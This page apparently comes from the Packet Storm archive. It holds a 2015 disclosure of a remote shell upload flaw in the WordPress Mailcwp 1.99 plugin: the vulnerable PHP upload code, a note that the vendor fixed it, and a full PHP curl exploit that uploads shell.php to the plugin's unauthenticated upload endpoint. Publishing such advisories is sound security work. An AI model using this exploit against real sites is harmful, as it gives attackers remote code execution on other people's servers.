exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Mailcwp 1.99 Shell Upload

WordPress Mailcwp 1.99 Shell Upload
Posted Jul 18, 2015
Authored by Larry W. Cashdollar

WordPress Mailcwp plugin version 1.99 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | b6c75244bccb060654da18817320f01d79e2899cd3f9645e3a63098f65ced174

WordPress Mailcwp 1.99 Shell Upload

Change Mirror Download
Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.
Vulnerability:
The code in mailcwp-upload.php doesn't check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server:

2 $message_id = $_REQUEST["message_id"];
3 $upload_dir = $_REQUEST["upload_dir"];
.
.
8 $fileName = $_FILES["file"]["name"];
9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");

Exploitation requires the attacker to guess a writeable location in the http server root.

CVEID:
OSVDB:
Exploit Code:
• <?php
• /*Larry W. Cashdollar @_larry0
• Exploit for mailcwp v1.99 shell will be called 1-shell.php.
• 7/9/2015
• */
• $target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
• $file_name_with_full_path = '/var/www/shell.php';

• echo "POST to $target_url $file_name_with_full_path";
• $post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path);

• $ch = curl_init();
• curl_setopt($ch, CURLOPT_URL,$target_url);
• curl_setopt($ch, CURLOPT_POST,1);
• curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
• curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
• $result=curl_exec ($ch);
• curl_close ($ch);
• echo "<hr>";
• echo $result;
• echo "<hr>";
• ?>

Advisory: http://www.vapid.dhs.org/advisory.php?v=138


Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close